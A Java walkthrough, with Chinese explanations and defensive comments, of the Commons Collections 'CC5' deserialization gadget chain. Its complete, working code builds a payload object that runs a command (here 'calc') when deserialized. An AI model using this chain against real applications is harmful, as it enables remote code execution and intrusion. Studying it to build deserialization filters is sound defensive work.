// Transformer array for the walkthrough. Once wrapped in a ChainedTransformer (next line),
// each element's result is handed to the next element as its input:
//   1. ConstantTransformer(c)                      - always yields c; c is declared outside this
//                                                    excerpt (the complete listing on this page
//                                                    assigns Runtime.class to it).
//   2. InvokerTransformer("getDeclaredMethod", ..) - reflectively looks up the method "getRuntime".
//   3. InvokerTransformer("invoke", ..)            - invokes that Method with (null, null).
//   4. InvokerTransformer("exec", ..)              - calls exec with the string "calc".
// Defensive reading: the risk is not the demo command but the primitive itself, a Serializable
// object that encodes arbitrary reflective calls. Hardened Commons Collections releases refuse
// to (de)serialize InvokerTransformer by default, and a deserialization filter
// (ObjectInputFilter / jdk.serialFilter) that rejects org.apache.commons.collections.functors.*
// stops the graph from being rebuilt at all.
Transformer[] T = { new ConstantTransformer(c), new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) };
// ChainedTransformer applies T in array order. LazyMap.decorate (the Commons Collections 3.x
// API name) returns a view over the empty HashMap that asks the transformer for a value when
// get() is called with a key the map does not hold, so a get() on map1 with a missing key is
// what runs the chain.
ChainedTransformer chainedTransformer = new ChainedTransformer(T); Map<Object,Object> map = new HashMap(); Map map1 = LazyMap.decorate(map, chainedTransformer);
与之前的链相比，只是换了一种方式来触发LazyMap的get方法。
// Binds the LazyMap view (map1) to the key "111". Nothing is ever put into the backing map in
// this listing, so a lookup of "111" is a miss and is answered by the transformer.
// Per the walkthrough text, TiedMapEntry.getValue() performs the get() on the wrapped map and
// TiedMapEntry.toString() calls getValue(), so any code that stringifies this entry reaches
// LazyMap.get().
TiedMapEntry tiedMapEntry = new TiedMapEntry(map1, "111");
这里选择了TiedMapEntry类：它的getValue方法会调用map的get方法。
TiedMapEntry的toString方法调用了getValue方法。
而toString方法则是在BadAttributeValueExpException中被调用的。
// The exception is constructed with null, and its "val" field (non-public, hence
// getDeclaredField + setAccessible) is then overwritten by reflection with the TiedMapEntry.
// NOTE(review): presumably the field is set after construction so that the entry is not
// stringified while the object is being built - confirm against the JDK in use.
// Per the walkthrough text, BadAttributeValueExpException is where toString() gets called on
// the stored value, which is the link back to TiedMapEntry.
// Detection / mitigation: a serialized javax.management.BadAttributeValueExpException whose val
// is a Commons Collections type is not something ordinary application traffic contains; an
// allow-list ObjectInputFilter on every ObjectInputStream that reads untrusted bytes rejects it
// before readObject runs.
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); Class m = BadAttributeValueExpException.class; Field f = m.getDeclaredField("val"); f.setAccessible(true); f.set(badAttributeValueExpException, tiedMapEntry);
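/**
 * Complete listing for the chain this page walks through:
 * BadAttributeValueExpException -> TiedMapEntry.toString() -> TiedMapEntry.getValue()
 * -> LazyMap.get() -> ChainedTransformer.
 *
 * <p>{@code main} builds the object graph, writes it to {@code ser.bin} and immediately reads
 * it back, so the demo command ("calc") is started on the local machine during
 * {@code readObject}.
 *
 * <p>Defensive takeaways: the trigger is an unfiltered {@link ObjectInputStream#readObject()}
 * with Commons Collections 3.x on the classpath. Hardened Commons Collections releases refuse
 * to (de)serialize {@code InvokerTransformer} by default, and an allow-list
 * {@code ObjectInputFilter} (or the {@code jdk.serialFilter} property) rejects the graph
 * before any of its classes are instantiated.
 */
public class cc5 {

    /**
     * Assembles the object graph, serializes it and deserializes it again.
     *
     * @param args unused
     * @throws Exception on reflection or I/O failure
     */
    public static void main(String[] args) throws Exception {
        Class<?> c = Runtime.class;

        // Each transformer's result is the next one's input once wrapped in ChainedTransformer.
        Transformer[] T = {
            new ConstantTransformer(c),
            new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(T);

        // LazyMap asks the transformer for a value when get() misses; the backing map stays empty.
        Map<Object, Object> map = new HashMap<>();
        Map map1 = LazyMap.decorate(map, chainedTransformer);

        // toString() on this entry leads to getValue(), which performs the get() on map1.
        TiedMapEntry tiedMapEntry = new TiedMapEntry(map1, "111");

        // Built with null, then the non-public "val" field is overwritten by reflection.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class<?> m = BadAttributeValueExpException.class;
        Field f = m.getDeclaredField("val");
        f.setAccessible(true);
        f.set(badAttributeValueExpException, tiedMapEntry);

        searilize(badAttributeValueExpException);
        unsearilize("ser.bin");

        // Direct reflective equivalent of the transformer array, kept from the original for reference:
        // Class c = Runtime.class;
        // Method m = c.getDeclaredMethod("getRuntime",null);
        // m.setAccessible(true);
        // Object o = m.invoke(null,null);
        // Method m2 = c.getDeclaredMethod("exec",String.class);
        // m2.setAccessible(true);
        // m2.invoke(o,"calc");
    }

    /**
     * Writes {@code o} to the file {@code ser.bin} in the working directory using Java native
     * serialization. The stream is closed (and therefore flushed) before returning; the
     * original left the file handle open.
     *
     * @param o object to serialize
     * @throws Exception if the file cannot be written or {@code o} is not serializable
     */
    public static void searilize(Object o) throws Exception {
        try (ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            objectOutputStream.writeObject(o);
        }
    }

    /**
     * Reads one object from the file {@code s} using Java native deserialization.
     *
     * @param s path of the file to read
     * @return the deserialized object
     * @throws Exception if the file cannot be read or a class in the stream cannot be resolved
     */
    public static Object unsearilize(String s) throws Exception {
        // NOTE(security): readObject() with no ObjectInputFilter is the sink this page
        // demonstrates. It is left unfiltered on purpose here; production code reading
        // untrusted bytes should set an allow-list filter on the stream before this call.
        try (ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(s))) {
            return objectInputStream.readObject();
        }
    }
}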